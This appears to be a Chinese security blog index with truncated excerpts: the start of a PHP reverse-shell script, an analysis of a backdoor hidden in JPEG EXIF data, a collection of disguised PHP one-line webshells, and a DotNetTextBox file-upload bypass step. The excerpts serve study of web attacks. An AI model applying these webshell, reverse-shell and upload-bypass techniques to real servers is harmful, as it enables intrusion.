Back connect for PHP

<?php 
function which($pr) {
	$path = execute("which $pr");
	return ($path ? $path : $pr);
}
function execute($cfe) {
	$res = '';
	if ($cfe) {
		if(function_exists('exec')) {
			@exec($cfe,$res);
			$res = j

[……]阅读全文

隐藏在JPG图片EXIF头部中的恶意软件

几天前,我们研究团队的 Peter Gramantik 在一个被攻破的网站上发现一个非常有趣的后门。这个后门并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码),但是它却把自己的数据隐藏在 JPEG 图片的 EXIT 头部中了。它也使用 exif_read_data 和 preg_replace 两个 PHP 函数来读取 EXIF 头部和执行。

技术细节
这个后门可分为两部分。第一部分是 exif_read_data 函数读取图片头部,preg_replace 函数来执行[……]阅读全文

PHP变异一句话后门大全分享

我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。

强悍的PHP一句话后门

这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html

[……]阅读全文

DotNetTextBox编辑器小洞 任意文件任意上传

漏洞作者:未提供

提交时间: 2013-03-12 17:27
公开时间: 2013-04-26 17:28

漏洞类型: 设计缺陷/逻辑错误
简要描述:

DotNetTextBox编辑器洞洞文件上传漏洞

详细说明:

1

漏洞证明:

1、用firebug将disabled=”disabled’,value=”jgp,gif,png”修改为enabled=”enabled”,value=”jpg,gif,png,aspx”,然后点更新成功按钮

&nb[……]阅读全文